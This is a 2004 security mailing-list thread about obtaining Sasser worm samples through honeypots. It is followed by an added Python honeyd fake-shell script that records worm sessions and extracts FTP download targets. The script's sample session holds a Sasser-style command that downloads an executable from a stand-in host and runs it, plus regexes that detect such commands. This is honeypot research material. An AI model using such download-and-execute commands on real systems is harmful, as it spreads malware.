Full Disclosure mailing list archives

Re: Wanted: Sasser executable and derivatives


From: Steve Kudlak <chromazine () sbcglobal net>
Date: Mon, 28 Jun 2004 18:38:25 -0700


I look at what my antivirus things catch and what Sentinare catches on
my formal account. Sentinare is pretty good with all this stuff. I have
not seen Sasser. I have seen Swen and BAGLE and IRCBOT.
The IRCBots stopped when I turned off sharing on pretty much everything.
I was sharing files between my main Win2k machine and the virtual
Red Hat Linux I have been working with.

Have Fun,
Sends Steve


James Riden wrote:

> Syke <syke () mantissecurity net> writes:
>
>> Wouldn't it be easier to use honeyd (www.honeyd.org) with an LSASS or
>> mydoom script? That way you can just check the logs for the binaries
>> that were uploaded?
>
> Yes, because you'll get an awful lot more than Sasser if you put an
> unpatched Win32 machine on the 'net. Even if you just leave off the
> MS04-011 patch, you could get other things, such as Korgo and Agobot
> variants IIRC.
>
> cheers,
> Jamie
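Syke's suggestion above, of letting honeyd run a service script on the port a worm's payload connects to and then reading the logs for what was uploaded, can be illustrated with a small script. honeyd hands each incoming TCP connection to the configured script over stdin/stdout, so the script below plays a bare Windows command shell, records whatever the attacker sends, and pulls the FTP "open host port" / "get file" lines out of the recorded command string, which is how Sasser-style payloads tell the freshly exploited host where to download the worm binary from. This is an added example written for this archive page, not code from honeyd, from the poster, or from any real worm; the sample session string, the fake shell banner, the regular expressions and the log path are all assumptions made for the example.

```python
#!/usr/bin/env python3
"""Honeyd-style fake shell that records a session and extracts the FTP
download target a worm payload tells its victim to fetch the binary from.

honeyd runs one copy of this script per TCP connection and connects the
attacker to the script's stdin/stdout. (Added example; not honeyd code.)
"""
import re
import sys
from dataclasses import dataclass
from typing import Optional, TextIO

# Payloads of the Sasser family drive ftp.exe with a script assembled from
# "echo <line>>>cmd.ftp" fragments. These regexes (an assumption of this
# example) pick the "open <host> <port>" and "get <file>" fragments out of
# such a string. Other worms will need their own patterns.
OPEN_RE = re.compile(r"echo\s+open\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)", re.I)
GET_RE = re.compile(r"echo\s+get\s+([^>\s]+)\s*>>", re.I)

# Constructed sample session, written to resemble the kind of command
# string a Sasser-style payload sends to its remote shell. Not a capture.
SAMPLE_SESSION = (
    "echo off&echo open 192.0.2.10 5554>>cmd.ftp&echo anonymous>>cmd.ftp"
    "&echo user&echo bin>>cmd.ftp&echo get 12345_up.exe>>cmd.ftp"
    "&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&12345_up.exe&echo off"
    "&del cmd.ftp&echo on\r\n"
)

# Fake banner; the exact text is an assumption, chosen to look like cmd.exe.
BANNER = (
    "Microsoft Windows 2000 [Version 5.00.2195]\r\n"
    "(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\n"
)
PROMPT = "C:\\WINNT\\system32>"


@dataclass
class FetchTarget:
    """Where the payload told the victim to download the binary from."""
    host: str
    port: int
    filename: str


def extract_fetch_target(session: str) -> Optional[FetchTarget]:
    """Return the FTP host/port/file named in a recorded session, or None
    when the session carries no recognisable download instruction."""
    open_m = OPEN_RE.search(session)
    get_m = GET_RE.search(session)
    if not open_m or not get_m:
        return None
    return FetchTarget(open_m.group(1), int(open_m.group(2)), get_m.group(1))


def serve_fake_shell(inp: TextIO, out: TextIO, log: TextIO) -> str:
    """Play a command shell on (inp, out): print a banner and a prompt,
    echo a prompt after every line, and copy every line the peer sends to
    `log`. Returns the full captured session text."""
    out.write(BANNER + PROMPT)
    out.flush()
    captured = []
    for line in inp:            # one line per command the attacker sends
        captured.append(line)
        log.write(line)
        log.flush()
        out.write(PROMPT)       # never execute anything; just keep talking
        out.flush()
    return "".join(captured)


if __name__ == "__main__":
    # Log path is an assumption; honeyd would start this with stdin/stdout
    # attached to the attacker's connection.
    with open("/tmp/fake-shell-session.log", "a") as logf:
        session = serve_fake_shell(sys.stdin, sys.stdout, logf)
        target = extract_fetch_target(session)
        if target:
            logf.write(f"# fetch ftp://{target.host}:{target.port}/"
                       f"{target.filename}\n")
```

The script only records the instruction; the binary itself still sits on the attacker's FTP server at the host and port named in the session, so it has to be pulled from there separately, from a machine you do not mind getting infected. honeyd attaches a script to a port with a configuration line of the form `add <template> tcp port <port> "<command>"`; which port to use depends on the worm being chased, so that is left to the reader.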
